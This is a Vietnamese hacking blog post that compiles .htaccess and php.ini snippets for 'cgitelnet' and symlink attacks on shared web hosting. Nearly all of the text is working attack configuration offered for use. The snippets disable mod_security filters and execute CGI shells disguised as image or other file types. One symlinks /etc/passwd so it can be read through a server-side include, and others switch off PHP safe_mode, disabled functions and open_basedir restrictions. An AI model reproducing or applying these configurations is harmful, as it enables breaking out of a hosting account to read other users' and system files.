Trang chủ
»
Local Attack
» Tổng hợp .htaccess cho cgitelnet & symlink
          17 thg 6, 2012
Tổng hợp .htaccess cho cgitelnet & symlink
Quote:
| Options +ExecCGI AddHandler cgi-script cgi pl cgi love jpg RewriteEngine on RewriteRule (.*).mil$ $1.cgi Options +FollowSymLinks DirectoryIndex cmd.html Options +Indexes RemoveHandler .hack AddType text/plain .hack | 
# Created By TurkBlackhats
# Generated By TR
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
turk.shtml:
<!--#include virtual="turk.txt" -->
ln -s /et/passwd turk.txt
options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
## START ##
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options +ExecCGI
AddHandler cgi-script cgi pl wasRewriteEngine on
RewriteRule (.*).was$ $1.was
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
SetEnv PHPRC /home/user/public_html/php.ini
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl x-zone
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

 
 
Không có nhận xét nào:
Đăng nhận xét